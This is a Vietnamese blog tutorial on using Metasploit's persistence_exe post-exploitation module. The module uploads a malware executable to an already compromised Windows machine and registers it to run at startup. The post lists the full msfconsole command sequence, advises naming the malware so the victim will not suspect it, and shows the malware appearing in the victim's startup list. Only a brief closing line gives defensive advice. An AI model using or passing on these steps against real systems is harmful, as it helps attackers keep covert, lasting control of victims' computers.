Sử dụng post persistence_exe để cài phần mềm Startup trên Windows - Metasploit - Thekalitools.com

Saturday, March 25, 2017

Sử dụng post persistence_exe để cài phần mềm Startup trên Windows - Metasploit

Sử dụng post/windows/manage/persistence_exe:

Có rất nhiều cách để làm được việc này, tuy nhiên ở khuôn khổ bài viết này mình sẽ hướng dẫn sử dụng Post persistence_exe nhé các bạn. Và nó có hai chức năng đó là upload một con malware vào hệ thống mục tiêu và thiết lập startup cho con malware đó.


Bắt đầu nào!

Khởi động Metasploit và chọn persistence_exe:

Nhập lệnh vào Terminal để khởi động Msf.
# msfconsole
Chọn Post cần sử dụng:
msf > use post/windows/manage/persistence_exe
Xem các tham số cần thiết lập cho Post này.

Thiết lập các tham số:

msf post(persistence_exe) > show options
show options
show options
Tùy chọn REXENAME chính là tên của phần mềm malware được đổi lại sau khi được upload lên. Các bạn nên chọn một cái tên nào đó ít bị nạn nhân nghi ngờ và tắt nó đi, ở đây mình ví dụ là đặt tên thekalitools.exe:
msf post(persistence_exe) > set REXENAME thekalitools.exe
Tùy chọn tiếp theo là REXEPATH chính là đường dẫn tới phần mềm malware mà ta muốn upload:
msf post(persistence_exe) > set REXEPATH /root/Desktop/malware.exe
Khác với Exploit thì muốn sử dụng một Post ta phải có một session được mở sẵn, Tùy chọn SESSION là Session ID của một session muốn sử dụng, bạn có thể dùng lệnh sessions để xem các session đang có. Còn muốn biết cách mở một session thì mời bạn đọc lại các bài trước của series này.
msf post(persistence_exe) > set SESSION 2
Cuối cùng là tùy chọn STARTUP, tham số này gồm có ba tham số được phép chọn đó là USER, SYSTEMSERVICE. Ở đây có SYSTEM là cao nhất nên ta chọn nó nhé:
msf post(persistence_exe) > set STARTUP SYSTEM
set option
set option

Bắt đầu chạy:

Và bước cuối là tiến hành chạy, vẫn sử dụng lệnh exploit nhé (dù nó không phải exploit):
msf post(persistence_exe) > exploit
exploit
exploit

Kiểm tra kết quả đạt được:

Quay trở lại mới máy tính Windows của nạn nhân, ta mở msconfig lên tab Startup đã có con malware của chúng ta, như vậy mỗi lần mục tiêu khởi động lại máy thì con malware cũng sẽ chạy theo.
Startup Windows.

Lời kết:

Đơn giản như vậy thôi là ta đã làm được một công đôi chuyện, rất dễ phải không. Vì vậy đối với các bạn sử dụng Windows nên lưu ý, khi mà thấy phần mềm lạ không biết nó là gì thì đừng có dại mà chạy nó nhé, và cũng hãy thường xuyên kiểm tra lại các Process đang chạy trên máy để nhận biết malware.

1 comment:

  1. Có cách nào chạy persistence trên win10 ko anh?

    ReplyDelete